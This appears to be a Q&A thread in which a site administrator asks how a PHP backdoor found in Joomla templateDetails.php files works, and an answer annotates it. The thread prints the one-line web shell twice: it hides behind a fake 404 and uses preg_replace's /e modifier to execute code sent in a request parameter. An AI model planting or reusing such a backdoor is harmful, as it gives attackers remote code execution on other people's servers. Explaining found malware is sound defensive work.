
I just found, on the Joomla installation of a site I am managing, a lot of templateDetails.php files hidden inside various folders with the following code:

<?php if (!isset($_REQUEST['e44e'])) header("HTTP/1.0 404 Not Found"); @preg_replace('/(.*)/e', @$_REQUEST['e44e'], ''); ?>

I promptly recovered a site backup, changed all administrator passwords and reinforced security on the website.

Can you explain to me how this kind of code can be used to steal from or damage the website?

Jonathan Leffler
Drake
  • maybe relevant - http://stackoverflow.com/questions/2142497/whats-wrong-with-using-request – Millard Nov 19 '15 at 12:33
  • It uses the [`e` flag](http://php.net/manual/en/reference.pcre.pattern.modifiers.php) to PCRE functions which evaluates PHP code in the regular expression thus allowing arbitrary code execution. – Linus Kleen Nov 19 '15 at 12:34

1 Answer


I've commented the code below to explain it:

<?php
// Check for a POST or GET (query string) variable called e44e
if (!isset($_REQUEST['e44e']))
    header("HTTP/1.0 404 Not Found"); // If that variable doesn't exist, send a 404

// This is quite clever - the 'e' flag in preg forces PHP to eval the string, and then
// in theory use the result as the preg_replace replacement (however in this case that
// bit doesn't matter, as actually all we are looking to do is execute whatever has been
// passed through the request - basically doing eval(), but hiding it so it's not as
// obvious, and won't get picked up (in theory) by any installs that block eval
// (although in practice most then also stop the e flag from working as well)
@preg_replace('/(.*)/e', @$_REQUEST['e44e'], '');
?>

In short, it's a fancy way to use eval(), allowing them to pass through any code as a query string, and then execute it!

Liam Wiltshire